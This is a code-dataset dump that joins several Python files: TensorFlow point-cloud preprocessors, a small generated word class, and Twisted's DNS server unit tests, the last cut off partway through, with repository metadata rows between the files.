weights are [1., 2.], then preprocessor1 will be applied with probability 1/3,
and preprocessor2 will be applied with probability 2/3.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define(
'subprocessors', [],
'Params for preprocessors. Each value should be a tuple of '
'(Preprocessor.Params(), BaseSchedule.Params()), where the schedule '
'defines the weights to use over time.')
return p
def __init__(self, params):
super().__init__(params)
p = self.params
if not p.subprocessors:
raise ValueError('No subprocessors were specified.')
subprocessors, schedules = zip(*p.subprocessors)
def _FilterNonSchedules(v):
return not issubclass(getattr(v, 'cls', False), schedule.BaseSchedule)
invalid_values = [_FilterNonSchedules(s) for s in schedules]
if any(invalid_values):
raise TypeError('Not all schedule values were schedules: '
f'{invalid_values}')
self.CreateChildren('subprocessors', list(subprocessors))
self.CreateChildren('schedules', list(schedules))
def TransformFeatures(self, features):
p = self.params
choice_list = []
weight_list = []
# Pass a unique copy of the input to each branch, in case the
# subprocessor destructively modifies the features in unexpected ways.
for subp, sched in zip(self.subprocessors, self.schedules):
choice_list.append(
lambda subp=subp: subp.TransformFeatures(features.DeepCopy()))
weight_list.append(sched.Value())
weight_tensor = tf.stack(weight_list)
chosen_bin = tf.random.categorical(
tf.math.log(weight_tensor[tf.newaxis]),
1,
seed=p.random_seed,
dtype=tf.int32)[0, 0]
features = tf.switch_case(chosen_bin, branch_fns=choice_list)
return features
def TransformShapes(self, shapes):
transformed_shapes = [
subp.TransformShapes(shapes.DeepCopy()) for subp in self.subprocessors
]
if not all(transformed_shapes[0] == curr for curr in transformed_shapes):
raise ValueError('Shapes after transformations were not identical: '
f'{transformed_shapes}')
return transformed_shapes[0]
def TransformDTypes(self, dtypes):
transformed_dtypes = [
subp.TransformDTypes(dtypes.DeepCopy()) for subp in self.subprocessors
]
if not all(transformed_dtypes[0] == curr for curr in transformed_dtypes):
raise ValueError('DTypes after transformations were not identical: '
f'{transformed_dtypes}')
return transformed_dtypes[0]
class SparseSampler(Preprocessor):
"""Fused SparseCenterSelector and SparseCellGatherFeatures.
This preprocessor expects features to contain the following keys:
- lasers.points_xyz of shape [P, 3]
- lasers.points_feature of shape [P, F]
Adds the following features:
anchor_centers - [num_centers, 3] - Floating point output containing the
center (x, y, z) locations for tiling anchor boxes.
cell_center_xyz - [num_centers, 3] - Floating point output containing
the center (x, y, z) locations for each cell to featurize.
cell_center_padding - [num_centers] - 0/1 padding for each center.
cell_points_xyz - [num_centers, num_neighbors, 3] - Floating point
output containing the (x, y, z) locations for each point for a given
center.
cell_feature - [num_centers, num_neighbors, F] - Floating point output
containing the features for each point for a given center.
cell_points_padding - [num_centers, num_neighbors] - 0/1 padding
for the points in each cell.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define('center_selector', 'farthest', 'Method to sample centers. '
'Valid options - uniform, farthest.')
p.Define('neighbor_sampler', 'uniform', 'Method to select neighbors. '
'Valid options - uniform, closest.')
p.Define('num_centers', 16, 'The number of centers to sample.')
p.Define(
'features_preparation_layers', [],
'A list of Params for layers to run on the features before '
'performing farthest point sampling. For example, one may wish to '
'drop points out of frustum for KITTI before selecting centers. '
'Note that these layers will not mutate the original features, '
'instead, a copy will be made.')
p.Define(
'keep_z_range', (-np.inf, np.inf),
'Only points that have z coordinates within this range are kept. '
'Approximate ground-removal can be performed by specifying a '
'lower-bound on the z-range.')
p.Define('num_neighbors', 64, 'Sample these many points within the '
'neighorhood.')
p.Define(
'max_distance', 1.0, 'Points with L2 distances from a center '
'larger than this threshold are not considered to be in the '
'neighborhood.')
return p
def __init__(self, params):
super().__init__(params)
p = self.params
if p.features_preparation_layers:
self.CreateChildren('features_preparation_layers',
p.features_preparation_layers)
def TransformFeatures(self, features):
p = self.params
n, m = p.num_centers, p.num_neighbors
prepared_features = features.DeepCopy()
if p.features_preparation_layers:
for prep_layer in self.features_preparation_layers:
prepared_features = prep_layer.FPropDefaultTheta(prepared_features)
points_data = prepared_features.lasers
points = py_utils.HasShape(points_data.points_xyz, [-1, 3])
if 'points_padding' in points_data:
points_mask = 1 - points_data.points_padding
points = tf.boolean_mask(points, points_mask)
# If num_points < num_centers, pad points to have at least num_centers
# points.
num_points = tf.shape(points)[0]
required_num_points = tf.maximum(num_points, p.num_centers)
zeros = tf.zeros([required_num_points - num_points, 3])
points = tf.concat([points, zeros], axis=0)
num_seeded_points = points_data.get('num_seeded_points', 0)
neighbor_algorithm = 'auto'
# Based on benchmarks, the hash solution works better when the number of
# centers is >= 16 and there are at least 10k points per point cloud.
if p.num_centers >= 16:
neighbor_algorithm = 'hash'
centers, center_paddings, indices, indices_paddings = ops.sample_points(
points=tf.expand_dims(points, 0),
points_padding=tf.zeros([1, required_num_points], tf.float32),
num_seeded_points=num_seeded_points,
center_selector=p.center_selector,
neighbor_sampler=p.neighbor_sampler,
neighbor_algorithm=neighbor_algorithm,
num_centers=p.num_centers,
center_z_min=p.keep_z_range[0],
center_z_max=p.keep_z_range[1],
num_neighbors=p.num_neighbors,
max_distance=p.max_distance,
random_seed=p.random_seed if p.random_seed else -1)
centers = py_utils.HasShape(centers, [1, n])[0, :]
center_paddings = py_utils.HasShape(center_paddings, [1, n])[0, :]
indices = py_utils.HasShape(indices, [1, n, m])[0, :]
indices_paddings = py_utils.HasShape(indices_paddings, [1, n, m])[0, :]
features.cell_center_padding = center_paddings
features.cell_center_xyz = py_utils.HasShape(
tf.gather(points, centers), [n, 3])
features.anchor_centers = features.cell_center_xyz
features.cell_points_xyz = py_utils.HasShape(
tf.gather(points, indices), [n, m, 3])
features.cell_feature = tf.gather(points_data.points_feature, indices)
features.cell_points_padding = indices_paddings
return features
def TransformShapes(self, shapes):
p = self.params
n, m, f = p.num_centers, p.num_neighbors, shapes.lasers.points_feature[-1]
shapes.anchor_centers = tf.TensorShape([n, 3])
shapes.cell_center_padding = tf.TensorShape([n])
shapes.cell_center_xyz = tf.TensorShape([n, 3])
shapes.cell_points_xyz = tf.TensorShape([n, m, 3])
shapes.cell_feature = tf.TensorShape([n, m, f])
shapes.cell_points_padding = tf.TensorShape([n, m])
return shapes
def TransformDTypes(self, dtypes):
dtypes.anchor_centers = tf.float32
dtypes.cell_center_padding = tf.float32
dtypes.cell_center_xyz = tf.float32
dtypes.cell_points_xyz = tf.float32
dtypes.cell_feature = tf.float32
dtypes.cell_points_padding = tf.float32
return dtypes
| [
"[email protected]"
] | |
68c3277a9fe9cd3efe646288a0c0b687daeb5f40 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_continua.py | 1d4f1175f6f6eee08a5947b834b37af45e65325d | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 230 | py |
#calss header
class _CONTINUA():
def __init__(self,):
self.name = "CONTINUA"
self.definitions = continuum
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['continuum']
| [
"[email protected]"
] | |
144e5a7d1b97218faf780fe0706e3cee01e48160 | 37fdc797f0060a67c1e9318032bc7102d4fd9ecd | /spider/beautifulsoup_test/lib/python3.7/site-packages/twisted/names/test/test_server.py | 1378cd4196e91a2ddb3a28c59f527bcdbe43cc1f | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | Change0224/PycharmProjects | 8fa3d23b399c5fb55661a79ca059f3da79847feb | 818ba4fd5dd8bcdaacae490ed106ffda868b6ca4 | refs/heads/master | 2021-02-06T15:37:16.653849 | 2020-03-03T14:30:44 | 2020-03-03T14:30:44 | 243,927,023 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 41,264 | py | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Test cases for L{twisted.names.server}.
"""
from __future__ import division, absolute_import
from zope.interface.verify import verifyClass
from twisted.internet import defer
from twisted.internet.interfaces import IProtocolFactory
from twisted.names import dns, error, resolve, server
from twisted.python import failure, log
from twisted.trial import unittest
class RaisedArguments(Exception):
"""
An exception containing the arguments raised by L{raiser}.
"""
def __init__(self, args, kwargs):
self.args = args
self.kwargs = kwargs
def raiser(*args, **kwargs):
"""
Raise a L{RaisedArguments} exception containing the supplied arguments.
Used as a fake when testing the call signatures of methods and functions.
"""
raise RaisedArguments(args, kwargs)
class NoResponseDNSServerFactory(server.DNSServerFactory):
"""
A L{server.DNSServerFactory} subclass which does not attempt to reply to any
received messages.
Used for testing logged messages in C{messageReceived} without having to
fake or patch the preceding code which attempts to deliver a response
message.
"""
def allowQuery(self, message, protocol, address):
"""
Deny all queries.
@param message: See L{server.DNSServerFactory.allowQuery}
@param protocol: See L{server.DNSServerFactory.allowQuery}
@param address: See L{server.DNSServerFactory.allowQuery}
@return: L{False}
@rtype: L{bool}
"""
return False
def sendReply(self, protocol, message, address):
"""
A noop send reply.
@param protocol: See L{server.DNSServerFactory.sendReply}
@param message: See L{server.DNSServerFactory.sendReply}
@param address: See L{server.DNSServerFactory.sendReply}
"""
class RaisingDNSServerFactory(server.DNSServerFactory):
"""
A L{server.DNSServerFactory} subclass whose methods raise an exception
containing the supplied arguments.
Used for stopping L{messageReceived} and testing the arguments supplied to
L{allowQuery}.
"""
class AllowQueryArguments(Exception):
"""
Contains positional and keyword arguments in C{args}.
"""
def allowQuery(self, *args, **kwargs):
"""
Raise the arguments supplied to L{allowQuery}.
@param args: Positional arguments which will be recorded in the raised
exception.
@type args: L{tuple}
@param kwargs: Keyword args which will be recorded in the raised
exception.
@type kwargs: L{dict}
"""
raise self.AllowQueryArguments(args, kwargs)
class RaisingProtocol(object):
"""
A partial fake L{IProtocol} whose methods raise an exception containing the
supplied arguments.
"""
class WriteMessageArguments(Exception):
"""
Contains positional and keyword arguments in C{args}.
"""
def writeMessage(self, *args, **kwargs):
"""
Raises the supplied arguments.
@param args: Positional arguments
@type args: L{tuple}
@param kwargs: Keyword args
@type kwargs: L{dict}
"""
raise self.WriteMessageArguments(args, kwargs)
class NoopProtocol(object):
"""
A partial fake L{dns.DNSProtocolMixin} with a noop L{writeMessage} method.
"""
def writeMessage(self, *args, **kwargs):
"""
A noop version of L{dns.DNSProtocolMixin.writeMessage}.
@param args: Positional arguments
@type args: L{tuple}
@param kwargs: Keyword args
@type kwargs: L{dict}
"""
class RaisingResolver(object):
"""
A partial fake L{IResolver} whose methods raise an exception containing the
supplied arguments.
"""
class QueryArguments(Exception):
"""
Contains positional and keyword arguments in C{args}.
"""
def query(self, *args, **kwargs):
"""
Raises the supplied arguments.
@param args: Positional arguments
@type args: L{tuple}
@param kwargs: Keyword args
@type kwargs: L{dict}
"""
raise self.QueryArguments(args, kwargs)
class RaisingCache(object):
"""
A partial fake L{twisted.names.cache.Cache} whose methods raise an exception
containing the supplied arguments.
"""
class CacheResultArguments(Exception):
"""
Contains positional and keyword arguments in C{args}.
"""
def cacheResult(self, *args, **kwargs):
"""
Raises the supplied arguments.
@param args: Positional arguments
@type args: L{tuple}
@param kwargs: Keyword args
@type kwargs: L{dict}
"""
raise self.CacheResultArguments(args, kwargs)
def assertLogMessage(testCase, expectedMessages, callable, *args, **kwargs):
"""
Assert that the callable logs the expected messages when called.
XXX: Put this somewhere where it can be re-used elsewhere. See #6677.
@param testCase: The threading_test case controlling the threading_test which triggers the
logged messages and on which assertions will be called.
@type testCase: L{unittest.SynchronousTestCase}
@param expectedMessages: A L{list} of the expected log messages
@type expectedMessages: L{list}
@param callable: The function which is expected to produce the
C{expectedMessages} when called.
@type callable: L{callable}
@param args: Positional arguments to be passed to C{callable}.
@type args: L{list}
@param kwargs: Keyword arguments to be passed to C{callable}.
@type kwargs: L{dict}
"""
loggedMessages = []
log.addObserver(loggedMessages.append)
testCase.addCleanup(log.removeObserver, loggedMessages.append)
callable(*args, **kwargs)
testCase.assertEqual(
[m['message'][0] for m in loggedMessages],
expectedMessages)
class DNSServerFactoryTests(unittest.TestCase):
"""
Tests for L{server.DNSServerFactory}.
"""
def test_resolverType(self):
"""
L{server.DNSServerFactory.resolver} is a L{resolve.ResolverChain}
instance
"""
self.assertIsInstance(
server.DNSServerFactory().resolver,
resolve.ResolverChain)
def test_resolverDefaultEmpty(self):
"""
L{server.DNSServerFactory.resolver} is an empty L{resolve.ResolverChain}
by default.
"""
self.assertEqual(
server.DNSServerFactory().resolver.resolvers,
[])
def test_authorities(self):
"""
L{server.DNSServerFactory.__init__} accepts an C{authorities}
argument. The value of this argument is a list and is used to extend the
C{resolver} L{resolve.ResolverChain}.
"""
dummyResolver = object()
self.assertEqual(
server.DNSServerFactory(
authorities=[dummyResolver]).resolver.resolvers,
[dummyResolver])
def test_caches(self):
"""
L{server.DNSServerFactory.__init__} accepts a C{caches} argument. The
value of this argument is a list and is used to extend the C{resolver}
L{resolve.ResolverChain}.
"""
dummyResolver = object()
self.assertEqual(
server.DNSServerFactory(
caches=[dummyResolver]).resolver.resolvers,
[dummyResolver])
def test_clients(self):
"""
L{server.DNSServerFactory.__init__} accepts a C{clients} argument. The
value of this argument is a list and is used to extend the C{resolver}
L{resolve.ResolverChain}.
"""
dummyResolver = object()
self.assertEqual(
server.DNSServerFactory(
clients=[dummyResolver]).resolver.resolvers,
[dummyResolver])
def test_resolverOrder(self):
"""
L{server.DNSServerFactory.resolver} contains an ordered list of
authorities, caches and clients.
"""
# Use classes here so that we can see meaningful names in threading_test results
class DummyAuthority(object):
pass
class DummyCache(object):
pass
class DummyClient(object):
pass
self.assertEqual(
server.DNSServerFactory(
authorities=[DummyAuthority],
caches=[DummyCache],
clients=[DummyClient]).resolver.resolvers,
[DummyAuthority, DummyCache, DummyClient])
def test_cacheDefault(self):
"""
L{server.DNSServerFactory.cache} is L{None} by default.
"""
self.assertIsNone(server.DNSServerFactory().cache)
def test_cacheOverride(self):
"""
L{server.DNSServerFactory.__init__} assigns the last object in the
C{caches} list to L{server.DNSServerFactory.cache}.
"""
dummyResolver = object()
self.assertEqual(
server.DNSServerFactory(caches=[object(), dummyResolver]).cache,
dummyResolver)
def test_canRecurseDefault(self):
"""
L{server.DNSServerFactory.canRecurse} is a flag indicating that this
server is capable of performing recursive DNS lookups. It defaults to
L{False}.
"""
self.assertFalse(server.DNSServerFactory().canRecurse)
def test_canRecurseOverride(self):
"""
L{server.DNSServerFactory.__init__} sets C{canRecurse} to L{True} if it
is supplied with C{clients}.
"""
self.assertEqual(
server.DNSServerFactory(clients=[None]).canRecurse, True)
def test_verboseDefault(self):
"""
L{server.DNSServerFactory.verbose} defaults to L{False}.
"""
self.assertFalse(server.DNSServerFactory().verbose)
def test_verboseOverride(self):
"""
L{server.DNSServerFactory.__init__} accepts a C{verbose} argument which
overrides L{server.DNSServerFactory.verbose}.
"""
self.assertTrue(server.DNSServerFactory(verbose=True).verbose)
def test_interface(self):
"""
L{server.DNSServerFactory} implements L{IProtocolFactory}.
"""
self.assertTrue(verifyClass(IProtocolFactory, server.DNSServerFactory))
def test_defaultProtocol(self):
"""
L{server.DNSServerFactory.protocol} defaults to L{dns.DNSProtocol}.
"""
self.assertIs(server.DNSServerFactory.protocol, dns.DNSProtocol)
def test_buildProtocolProtocolOverride(self):
"""
L{server.DNSServerFactory.buildProtocol} builds a protocol by calling
L{server.DNSServerFactory.protocol} with its self as a positional
argument.
"""
class FakeProtocol(object):
factory = None
args = None
kwargs = None
stubProtocol = FakeProtocol()
def fakeProtocolFactory(*args, **kwargs):
stubProtocol.args = args
stubProtocol.kwargs = kwargs
return stubProtocol
f = server.DNSServerFactory()
f.protocol = fakeProtocolFactory
p = f.buildProtocol(addr=None)
self.assertEqual(
(stubProtocol, (f,), {}),
(p, p.args, p.kwargs)
)
def test_verboseLogQuiet(self):
"""
L{server.DNSServerFactory._verboseLog} does not log messages unless
C{verbose > 0}.
"""
f = server.DNSServerFactory()
assertLogMessage(
self,
[],
f._verboseLog,
'Foo Bar'
)
def test_verboseLogVerbose(self):
"""
L{server.DNSServerFactory._verboseLog} logs a message if C{verbose > 0}.
"""
f = server.DNSServerFactory(verbose=1)
assertLogMessage(
self,
['Foo Bar'],
f._verboseLog,
'Foo Bar'
)
def test_messageReceivedLoggingNoQuery(self):
"""
L{server.DNSServerFactory.messageReceived} logs about an empty query if
the message had no queries and C{verbose} is C{>0}.
"""
m = dns.Message()
f = NoResponseDNSServerFactory(verbose=1)
assertLogMessage(
self,
["Empty query from ('192.0.2.100', 53)"],
f.messageReceived,
message=m, proto=None, address=('192.0.2.100', 53))
def test_messageReceivedLogging1(self):
"""
L{server.DNSServerFactory.messageReceived} logs the query types of all
queries in the message if C{verbose} is set to C{1}.
"""
m = dns.Message()
m.addQuery(name='example.com', type=dns.MX)
m.addQuery(name='example.com', type=dns.AAAA)
f = NoResponseDNSServerFactory(verbose=1)
assertLogMessage(
self,
["MX AAAA query from ('192.0.2.100', 53)"],
f.messageReceived,
message=m, proto=None, address=('192.0.2.100', 53))
def test_messageReceivedLogging2(self):
"""
L{server.DNSServerFactory.messageReceived} logs the repr of all queries
in the message if C{verbose} is set to C{2}.
"""
m = dns.Message()
m.addQuery(name='example.com', type=dns.MX)
m.addQuery(name='example.com', type=dns.AAAA)
f = NoResponseDNSServerFactory(verbose=2)
assertLogMessage(
self,
["<Query example.com MX IN> "
"<Query example.com AAAA IN> query from ('192.0.2.100', 53)"],
f.messageReceived,
message=m, proto=None, address=('192.0.2.100', 53))
def test_messageReceivedTimestamp(self):
"""
L{server.DNSServerFactory.messageReceived} assigns a unix timestamp to
the received message.
"""
m = dns.Message()
f = NoResponseDNSServerFactory()
t = object()
self.patch(server.time, 'time', lambda: t)
f.messageReceived(message=m, proto=None, address=None)
self.assertEqual(m.timeReceived, t)
def test_messageReceivedAllowQuery(self):
"""
L{server.DNSServerFactory.messageReceived} passes all messages to
L{server.DNSServerFactory.allowQuery} along with the receiving protocol
and origin address.
"""
message = dns.Message()
dummyProtocol = object()
dummyAddress = object()
f = RaisingDNSServerFactory()
e = self.assertRaises(
RaisingDNSServerFactory.AllowQueryArguments,
f.messageReceived,
message=message, proto=dummyProtocol, address=dummyAddress)
args, kwargs = e.args
self.assertEqual(args, (message, dummyProtocol, dummyAddress))
self.assertEqual(kwargs, {})
def test_allowQueryFalse(self):
"""
If C{allowQuery} returns C{False},
L{server.DNSServerFactory.messageReceived} calls L{server.sendReply}
with a message whose C{rCode} is L{dns.EREFUSED}.
"""
class SendReplyException(Exception):
pass
class RaisingDNSServerFactory(server.DNSServerFactory):
def allowQuery(self, *args, **kwargs):
return False
def sendReply(self, *args, **kwargs):
raise SendReplyException(args, kwargs)
f = RaisingDNSServerFactory()
e = self.assertRaises(
SendReplyException,
f.messageReceived,
message=dns.Message(), proto=None, address=None)
(proto, message, address), kwargs = e.args
self.assertEqual(message.rCode, dns.EREFUSED)
def _messageReceivedTest(self, methodName, message):
"""
Assert that the named method is called with the given message when it is
passed to L{DNSServerFactory.messageReceived}.
@param methodName: The name of the method which is expected to be
called.
@type methodName: L{str}
@param message: The message which is expected to be passed to the
C{methodName} method.
@type message: L{dns.Message}
"""
# Make it appear to have some queries so that
# DNSServerFactory.allowQuery allows it.
message.queries = [None]
receivedMessages = []
def fakeHandler(message, protocol, address):
receivedMessages.append((message, protocol, address))
protocol = NoopProtocol()
factory = server.DNSServerFactory(None)
setattr(factory, methodName, fakeHandler)
factory.messageReceived(message, protocol)
self.assertEqual(receivedMessages, [(message, protocol, None)])
def test_queryMessageReceived(self):
"""
L{DNSServerFactory.messageReceived} passes messages with an opcode of
C{OP_QUERY} on to L{DNSServerFactory.handleQuery}.
"""
self._messageReceivedTest(
'handleQuery', dns.Message(opCode=dns.OP_QUERY))
def test_inverseQueryMessageReceived(self):
"""
L{DNSServerFactory.messageReceived} passes messages with an opcode of
C{OP_INVERSE} on to L{DNSServerFactory.handleInverseQuery}.
"""
self._messageReceivedTest(
'handleInverseQuery', dns.Message(opCode=dns.OP_INVERSE))
def test_statusMessageReceived(self):
"""
L{DNSServerFactory.messageReceived} passes messages with an opcode of
C{OP_STATUS} on to L{DNSServerFactory.handleStatus}.
"""
self._messageReceivedTest(
'handleStatus', dns.Message(opCode=dns.OP_STATUS))
def test_notifyMessageReceived(self):
"""
L{DNSServerFactory.messageReceived} passes messages with an opcode of
C{OP_NOTIFY} on to L{DNSServerFactory.handleNotify}.
"""
self._messageReceivedTest(
'handleNotify', dns.Message(opCode=dns.OP_NOTIFY))
def test_updateMessageReceived(self):
"""
L{DNSServerFactory.messageReceived} passes messages with an opcode of
C{OP_UPDATE} on to L{DNSServerFactory.handleOther}.
This may change if the implementation ever covers update messages.
"""
self._messageReceivedTest(
'handleOther', dns.Message(opCode=dns.OP_UPDATE))
def test_connectionTracking(self):
"""
The C{connectionMade} and C{connectionLost} methods of
L{DNSServerFactory} cooperate to keep track of all L{DNSProtocol}
objects created by a factory which are connected.
"""
protoA, protoB = object(), object()
factory = server.DNSServerFactory()
factory.connectionMade(protoA)
self.assertEqual(factory.connections, [protoA])
factory.connectionMade(protoB)
self.assertEqual(factory.connections, [protoA, protoB])
factory.connectionLost(protoA)
self.assertEqual(factory.connections, [protoB])
factory.connectionLost(protoB)
self.assertEqual(factory.connections, [])
def test_handleQuery(self):
"""
L{server.DNSServerFactory.handleQuery} takes the first query from the
supplied message and dispatches it to
L{server.DNSServerFactory.resolver.query}.
"""
m = dns.Message()
m.addQuery(b'one.example.com')
m.addQuery(b'two.example.com')
f = server.DNSServerFactory()
f.resolver = RaisingResolver()
e = self.assertRaises(
RaisingResolver.QueryArguments,
f.handleQuery,
message=m, protocol=NoopProtocol(), address=None)
(query,), kwargs = e.args
self.assertEqual(query, m.queries[0])
def test_handleQueryCallback(self):
"""
L{server.DNSServerFactory.handleQuery} adds
L{server.DNSServerFactory.resolver.gotResolverResponse} as a callback to
the deferred returned by L{server.DNSServerFactory.resolver.query}. It
is called with the query response, the original protocol, message and
origin address.
"""
f = server.DNSServerFactory()
d = defer.Deferred()
class FakeResolver(object):
def query(self, *args, **kwargs):
return d
f.resolver = FakeResolver()
gotResolverResponseArgs = []
def fakeGotResolverResponse(*args, **kwargs):
gotResolverResponseArgs.append((args, kwargs))
f.gotResolverResponse = fakeGotResolverResponse
m = dns.Message()
m.addQuery(b'one.example.com')
stubProtocol = NoopProtocol()
dummyAddress = object()
f.handleQuery(message=m, protocol=stubProtocol, address=dummyAddress)
dummyResponse = object()
d.callback(dummyResponse)
self.assertEqual(
gotResolverResponseArgs,
[((dummyResponse, stubProtocol, m, dummyAddress), {})])
def test_handleQueryErrback(self):
"""
L{server.DNSServerFactory.handleQuery} adds
L{server.DNSServerFactory.resolver.gotResolverError} as an errback to
the deferred returned by L{server.DNSServerFactory.resolver.query}. It
is called with the query failure, the original protocol, message and
origin address.
"""
f = server.DNSServerFactory()
d = defer.Deferred()
class FakeResolver(object):
def query(self, *args, **kwargs):
return d
f.resolver = FakeResolver()
gotResolverErrorArgs = []
def fakeGotResolverError(*args, **kwargs):
gotResolverErrorArgs.append((args, kwargs))
f.gotResolverError = fakeGotResolverError
m = dns.Message()
m.addQuery(b'one.example.com')
stubProtocol = NoopProtocol()
dummyAddress = object()
f.handleQuery(message=m, protocol=stubProtocol, address=dummyAddress)
stubFailure = failure.Failure(Exception())
d.errback(stubFailure)
self.assertEqual(
gotResolverErrorArgs,
[((stubFailure, stubProtocol, m, dummyAddress), {})])
def test_gotResolverResponse(self):
"""
L{server.DNSServerFactory.gotResolverResponse} accepts a tuple of
resource record lists and triggers a response message containing those
resource record lists.
"""
f = server.DNSServerFactory()
answers = []
authority = []
additional = []
e = self.assertRaises(
RaisingProtocol.WriteMessageArguments,
f.gotResolverResponse,
(answers, authority, additional),
protocol=RaisingProtocol(), message=dns.Message(), address=None)
(message,), kwargs = e.args
self.assertIs(message.answers, answers)
self.assertIs(message.authority, authority)
self.assertIs(message.additional, additional)
def test_gotResolverResponseCallsResponseFromMessage(self):
"""
L{server.DNSServerFactory.gotResolverResponse} calls
L{server.DNSServerFactory._responseFromMessage} to generate a response.
"""
factory = NoResponseDNSServerFactory()
factory._responseFromMessage = raiser
request = dns.Message()
request.timeReceived = 1
e = self.assertRaises(
RaisedArguments,
factory.gotResolverResponse,
([], [], []),
protocol=None, message=request, address=None
)
self.assertEqual(
((), dict(message=request, rCode=dns.OK,
answers=[], authority=[], additional=[])),
(e.args, e.kwargs)
)
def test_responseFromMessageNewMessage(self):
"""
L{server.DNSServerFactory._responseFromMessage} generates a response
message which is a copy of the request message.
"""
factory = server.DNSServerFactory()
request = dns.Message(answer=False, recAv=False)
response = factory._responseFromMessage(message=request),
self.assertIsNot(request, response)
def test_responseFromMessageRecursionAvailable(self):
"""
L{server.DNSServerFactory._responseFromMessage} generates a response
message whose C{recAV} attribute is L{True} if
L{server.DNSServerFactory.canRecurse} is L{True}.
"""
factory = server.DNSServerFactory()
factory.canRecurse = True
response1 = factory._responseFromMessage(
message=dns.Message(recAv=False))
factory.canRecurse = False
response2 = factory._responseFromMessage(
message=dns.Message(recAv=True))
self.assertEqual(
(True, False),
(response1.recAv, response2.recAv))
def test_responseFromMessageTimeReceived(self):
"""
L{server.DNSServerFactory._responseFromMessage} generates a response
message whose C{timeReceived} attribute has the same value as that found
on the request.
"""
factory = server.DNSServerFactory()
request = dns.Message()
request.timeReceived = 1234
response = factory._responseFromMessage(message=request)
self.assertEqual(request.timeReceived, response.timeReceived)
def test_responseFromMessageMaxSize(self):
"""
L{server.DNSServerFactory._responseFromMessage} generates a response
message whose C{maxSize} attribute has the same value as that found
on the request.
"""
factory = server.DNSServerFactory()
request = dns.Message()
request.maxSize = 0
response = factory._responseFromMessage(message=request)
self.assertEqual(request.maxSize, response.maxSize)
def test_messageFactory(self):
"""
L{server.DNSServerFactory} has a C{_messageFactory} attribute which is
L{dns.Message} by default.
"""
self.assertIs(dns.Message, server.DNSServerFactory._messageFactory)
def test_responseFromMessageCallsMessageFactory(self):
"""
L{server.DNSServerFactory._responseFromMessage} calls
C{dns._responseFromMessage} to generate a response
message from the request message. It supplies the request message and
other keyword arguments which should be passed to the response message
initialiser.
"""
factory = server.DNSServerFactory()
self.patch(dns, '_responseFromMessage', raiser)
request = dns.Message()
e = self.assertRaises(
RaisedArguments,
factory._responseFromMessage,
message=request, rCode=dns.OK
)
self.assertEqual(
((), dict(responseConstructor=factory._messageFactory,
message=request, rCode=dns.OK, recAv=factory.canRecurse,
auth=False)),
(e.args, e.kwargs)
)
def test_responseFromMessageAuthoritativeMessage(self):
"""
L{server.DNSServerFactory._responseFromMessage} marks the response
message as authoritative if any of the answer records are authoritative.
"""
factory = server.DNSServerFactory()
response1 = factory._responseFromMessage(
message=dns.Message(), answers=[dns.RRHeader(auth=True)])
response2 = factory._responseFromMessage(
message=dns.Message(), answers=[dns.RRHeader(auth=False)])
self.assertEqual(
(True, False),
(response1.auth, response2.auth),
)
def test_gotResolverResponseLogging(self):
"""
L{server.DNSServerFactory.gotResolverResponse} logs the total number of
records in the response if C{verbose > 0}.
"""
f = NoResponseDNSServerFactory(verbose=1)
answers = [dns.RRHeader()]
authority = [dns.RRHeader()]
additional = [dns.RRHeader()]
assertLogMessage(
self,
["Lookup found 3 records"],
f.gotResolverResponse,
(answers, authority, additional),
protocol=NoopProtocol(), message=dns.Message(), address=None)
def test_gotResolverResponseCaching(self):
"""
L{server.DNSServerFactory.gotResolverResponse} caches the response if at
least one cache was provided in the constructor.
"""
f = NoResponseDNSServerFactory(caches=[RaisingCache()])
m = dns.Message()
m.addQuery(b'example.com')
expectedAnswers = [dns.RRHeader()]
expectedAuthority = []
expectedAdditional = []
e = self.assertRaises(
RaisingCache.CacheResultArguments,
f.gotResolverResponse,
(expectedAnswers, expectedAuthority, expectedAdditional),
protocol=NoopProtocol(), message=m, address=None)
(query, (answers, authority, additional)), kwargs = e.args
self.assertEqual(query.name.name, b'example.com')
self.assertIs(answers, expectedAnswers)
self.assertIs(authority, expectedAuthority)
self.assertIs(additional, expectedAdditional)
def test_gotResolverErrorCallsResponseFromMessage(self):
"""
L{server.DNSServerFactory.gotResolverError} calls
L{server.DNSServerFactory._responseFromMessage} to generate a response.
"""
factory = NoResponseDNSServerFactory()
factory._responseFromMessage = raiser
request = dns.Message()
request.timeReceived = 1
e = self.assertRaises(
RaisedArguments,
factory.gotResolverError,
failure.Failure(error.DomainError()),
protocol=None, message=request, address=None
)
self.assertEqual(
((), dict(message=request, rCode=dns.ENAME)),
(e.args, e.kwargs)
)
def _assertMessageRcodeForError(self, responseError, expectedMessageCode):
"""
L{server.DNSServerFactory.gotResolver} accepts a L{failure.Failure} and
triggers a response message whose rCode corresponds to the DNS error
contained in the C{Failure}.
@param responseError: The L{Exception} instance which is expected to
trigger C{expectedMessageCode} when it is supplied to
C{gotResolverError}
@type responseError: L{Exception}
@param expectedMessageCode: The C{rCode} which is expected in the
message returned by C{gotResolverError} in response to
C{responseError}.
@type expectedMessageCode: L{int}
"""
f = server.DNSServerFactory()
e = self.assertRaises(
RaisingProtocol.WriteMessageArguments,
f.gotResolverError,
failure.Failure(responseError),
protocol=RaisingProtocol(), message=dns.Message(), address=None)
(message,), kwargs = e.args
self.assertEqual(message.rCode, expectedMessageCode)
def test_gotResolverErrorDomainError(self):
"""
L{server.DNSServerFactory.gotResolver} triggers a response message with
an C{rCode} of L{dns.ENAME} if supplied with a L{error.DomainError}.
"""
self._assertMessageRcodeForError(error.DomainError(), dns.ENAME)
def test_gotResolverErrorAuthoritativeDomainError(self):
"""
L{server.DNSServerFactory.gotResolver} triggers a response message with
an C{rCode} of L{dns.ENAME} if supplied with a
L{error.AuthoritativeDomainError}.
"""
self._assertMessageRcodeForError(
